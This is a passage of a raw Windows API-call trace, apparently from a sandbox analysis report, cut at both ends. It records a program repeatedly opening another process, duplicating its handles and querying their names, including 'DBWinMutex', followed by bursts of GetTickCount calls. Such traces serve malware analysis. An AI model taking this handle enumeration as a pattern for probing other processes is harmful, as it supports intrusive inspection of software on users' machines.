(hObject=0x198) returned 1 [0114.079] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.080] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x61c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.080] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.080] CloseHandle (hObject=0x1b8) returned 1 [0114.080] CloseHandle (hObject=0x198) returned 1 [0114.080] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.080] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x620, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.080] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.080] CloseHandle (hObject=0x1b8) returned 1 [0114.081] CloseHandle (hObject=0x198) returned 1 [0114.081] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.081] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x624, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.081] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.081] CloseHandle (hObject=0x1b8) returned 1 [0114.081] CloseHandle (hObject=0x198) returned 1 [0114.081] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.081] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x628, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.081] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.082] CloseHandle (hObject=0x1b8) returned 1 [0114.082] CloseHandle (hObject=0x198) returned 1 [0114.082] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.082] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x62c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.082] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.082] CloseHandle (hObject=0x1b8) returned 1 [0114.083] CloseHandle (hObject=0x198) returned 1 [0114.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.083] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x630, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.083] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.083] CloseHandle (hObject=0x1b8) returned 1 [0114.083] CloseHandle (hObject=0x198) returned 1 [0114.083] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.083] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x634, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.084] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.084] CloseHandle (hObject=0x1b8) returned 1 [0114.084] CloseHandle (hObject=0x198) returned 1 [0114.084] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.084] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x638, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.084] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.085] CloseHandle (hObject=0x1b8) returned 1 [0114.085] CloseHandle (hObject=0x198) returned 1 [0114.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.085] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x63c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.085] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.085] CloseHandle (hObject=0x1b8) returned 1 [0114.085] CloseHandle (hObject=0x198) returned 1 [0114.085] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.085] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x640, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.086] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.086] CloseHandle (hObject=0x1b8) returned 1 [0114.086] CloseHandle (hObject=0x198) returned 1 [0114.086] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.086] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x644, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.086] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.086] CloseHandle (hObject=0x1b8) returned 1 [0114.086] CloseHandle (hObject=0x198) returned 1 [0114.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.087] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x648, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.087] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.087] CloseHandle (hObject=0x1b8) returned 1 [0114.087] CloseHandle (hObject=0x198) returned 1 [0114.087] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.087] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x64c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.087] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.087] CloseHandle (hObject=0x1b8) returned 1 [0114.088] CloseHandle (hObject=0x198) returned 1 [0114.088] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.088] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x650, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.088] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.088] CloseHandle (hObject=0x1b8) returned 1 [0114.088] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.089] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.090] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.091] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.091] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.092] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.092] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.092] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.093] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.093] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.094] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.094] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.094] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.095] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.095] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.095] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.096] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.096] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.096] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.096] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.097] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.097] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.097] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.097] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.098] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.098] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.098] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.099] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.099] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.099] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.100] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.100] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.100] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.101] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.101] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.101] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.102] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.104] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.104] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.104] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.105] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.105] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.106] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.106] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.106] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.107] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.107] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.107] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.108] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.108] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.108] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.109] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.109] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.110] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.111] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.111] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.113] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.113] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.114] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.114] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.114] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.114] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.115] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.115] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.115] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.116] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.116] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.116] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.116] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.117] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.117] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.117] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.118] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.118] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.119] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.119] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.119] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.120] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.120] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.120] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x278) returned 0x198 [0114.124] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.124] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.129] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.129] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7a, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.133] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.133] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x78, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.134] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x50) returned 0x32e40850 [0114.134] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x1, ObjectInformation=0x32e40850, ObjectInformationLength=0x4c, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0x0 [0114.134] CLSIDFromString (in: lpsz="DBWinMutex", pclsid=0xce9f8 | out: pclsid=0xce9f8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x800401f3 [0114.136] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.162] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.162] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.163] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.163] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.165] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.165] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.167] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.167] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.170] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.170] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.174] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.174] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.175] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.175] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.192] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.192] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.199] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.199] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x7e, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.199] GetTickCount () returned 0xe8672d [0114.199] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.199] GetTickCount () returned 0xe8672d [0114.199] CloseHandle (hObject=0x1b8) returned 1 [0114.200] GetTickCount () returned 0xe8672d [0114.200] GetTickCount () returned 0xe8672d [0114.200] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x8c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0114.200] GetTickCount () returned 0xe8672d [0114.200] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.200] GetTickCount () returned 0xe8672d [0114.200] GetTickCount () returned 0xe8672d [0114.200] CloseHandle (hObject=0x1b8) returned 1 [0114.200] GetTickCount () returned 0xe8672d [0114.200] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.201] GetTickCount () returned 0xe8672d [0114.202] GetTickCount () returned 0xe8672d [0114.202] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.202] GetTickCount () returned 0xe8672d [0114.202] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x80) returned 0x32e40850 [0114.202] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x2, ObjectInformation=0x32e40850, ObjectInformationLength=0x76, ReturnLength=0xce88c | out: ObjectInformation=0x32e40850, ReturnLength=0xce88c) returned 0xc0000004 [0114.202] GetTickCount () returned 0xe8672d [0114.202] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e40850 | out: hHeap=0x2150000) returned 1 [0114.202] GetTickCount () returned 0xe8672d [0114.202] CloseHandle (hObject=0x1b8) returned 1 [0114.202] GetTickCount () returned 0xe8672d [0114.202] GetTickCount () returned 0xe8672d [0114.202] GetTickCount () returned 0xe8672d [0114.202] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.202] GetTickCount () returned 0xe8672d [0114.202] GetTickCount () returned 0xe8672d [0114.202] CloseHandle (hObject=0x1b8) returned 1 [0114.203] GetTickCount () returned 0xe8672d [0114.203] GetTickCount () returned 0xe8672d [0114.203] GetTickCount () returned 0xe8672d [0114.203] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.203] GetTickCount () returned 0xe8672d [0114.203] GetTickCount () returned 0xe8672d [0114.203] CloseHandle (hObject=0x1b8) returned 1 [0114.203] GetTickCount () returned 0xe8672d [0114.203] GetTickCount () returned 0xe8672d [0114.203] GetTickCount () returned 0xe8672d [0114.203] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0114.203] GetTickCount () returned 0xe8672d [0114.203] GetTickCount () returned 0xe8672d [0114.203] CloseHandle (hObject=0x1b8) returned 1 [0114.204] GetTickCount () returned 0xe8672d [0114.204] GetTickCount () returned 0xe8672d [0114.204] GetTickCount () returned 0xe8672d [0114.204] NtQueryObject 